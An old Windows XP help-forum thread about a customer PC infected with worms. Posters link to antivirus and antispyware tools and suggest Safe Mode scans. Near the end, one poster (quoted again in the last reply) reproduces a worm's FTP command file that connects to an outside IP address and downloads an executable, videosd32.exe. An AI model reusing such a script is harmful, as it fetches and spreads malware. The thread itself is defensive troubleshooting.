SRES32.EXE

[Guest]

Hi,

I have a customers PC running XP Home SP1 - brand new box just connected on
Broadband - it's definitely got a virus on it but ZoneAlarm has failed to
block it (apparently) and AVG and various other tools I've run all fail to
pick anything up.

I've had a look at the processes being run at the time and come up with
several:-

sres32.exe
wvsvc.exe
isasv32.exe
command32.exe

According to Symantec the command32 process could be VBS.Nevesc (by
Kapersky), and all I can find with regard to sres32.exe is on some Franch and
German sites (and my French and German are not that good!)

Anyone got any ideas?

Cheers,

Vipersman

 

[Andre Da Costa]

http://service1.symantec.com/SUPPOR...2001111912274039?OpenDocument&src=sec_doc_nam

Follow the instructions for disabling system restore, restart the PC in safe
Mode and run a scan. when your antivirus program finds the location of the
virus, navigate to it and delete it.

The restart your PC.

Ad-Aware - www.lavasoftusa.com
Spybot - http://www.safer-networking.org/
CWShredder - http://forum.aumha.org/downloads/cwshredder.zip
Spy Sweeper - www.webroot.com

Andre

 

[Andre Da Costa]

http://www.blackviper.com

Andre

 

[S.Sengupta]

scan your system with latest virus definitioned
antivirus/adaware/spybot/cwshredder.Run them in safe mode.
Ad-Aware - www.lavasoftusa.com
Spybot - http://www.safer-networking.org/
CWShredder - http://forum.aumha.org/downloads/cwshredder.zip

regards,
ssg MS-MVP
pronetworks.org

 

[Alex Nichol]

I have a customers PC running XP Home SP1 - brand new box just connected on
Broadband - it's definitely got a virus on it but ZoneAlarm has failed to
block it (apparently) and AVG and various other tools I've run all fail to
pick anything up.

A firewall is only any good at blocking a few viruses; Most come in via
infected mail or downloads. And there is no one AV package that
catches *everything*

I've had a look at the processes being run at the time and come up with
several:-

sres32.exe
wvsvc.exe
isasv32.exe
command32.exe

According to Symantec the command32 process could be VBS.Nevesc (by
Kapersky), and all I can find with regard to sres32.exe is on some Franch and
German sites (and my French and German are not that good!)

Anyone got any ideas?

http://rgharper.mvps.org/cleanit.htm for good advice and links to tools.
I would start with Stinger from McAfee, and then get the free trial of
eTrust ezArmor (the firewall component is the Zone Alarm engine which
you already have but the AV component is a very good one). Once
downloaded do the installations and initial runs in Safe mode, to help
avoid a virus inhibiting the AV package as some do. Then in normal boot
make sure you have the very latest signatures and run a scan again

 

[Guest]

Thanks Andre - I'll give that a go.

Cheers,

Vipersman

 

[Guest]

Thanks Alex,

I eventually tracked the problem down to the Bloodhound worm (a file called
command32.exe in c:/windows/system) and the sres32.exe was a process run from
the Spybot worm. The updated definitions from NAV spotted them but couldn't
delete them unless I ran in Safe Mode. The McAfee Stinger didn't find
anything! But I'll be visiting the link you posted for the future.

Cheers

Vipersman

 

[wickedfun911]

i have been having huge problems with wvsvc.exe, after som
investigation i have found the following relationships
c:\winnt\system32\ in there you will find wvsvc.exe, c.bat and
"no-name" shortcut or .pif file these are all somehow related and sen
out a huge amount of network traffic , the .pif file is the comman
file for the wvsvc.exe and reads something like this...
open 194.230.231.145
user a a
binary
GET videosd32.exe
bye
what this is i dont know, but i am running all the latest update
ad-aware and pestpatrol together with norton and mcafee antivirus
once in a while i get a warning about an ftpworm, but do full scans an
nothing is found, i have now deleted all the programs and so far no mor
problems


-
wickedfun91

 

[Rock]

i have been having huge problems with wvsvc.exe, after some
investigation i have found the following relationships ,
c:\winnt\system32\ in there you will find wvsvc.exe, c.bat and a
"no-name" shortcut or .pif file these are all somehow related and send
out a huge amount of network traffic , the .pif file is the command
file for the wvsvc.exe and reads something like this...
open 194.230.231.145
user a a
binary
GET videosd32.exe
bye
what this is i dont know, but i am running all the latest updated
ad-aware and pestpatrol together with norton and mcafee antivirus .
once in a while i get a warning about an ftpworm, but do full scans and
nothing is found, i have now deleted all the programs and so far no more
problems.

wvsvc.exe is part of a memory resident worm.
http://uk.trendmicro-europe.com/enterprise/security_info/ve_detail.php?VName=WORM_RBOT.QQ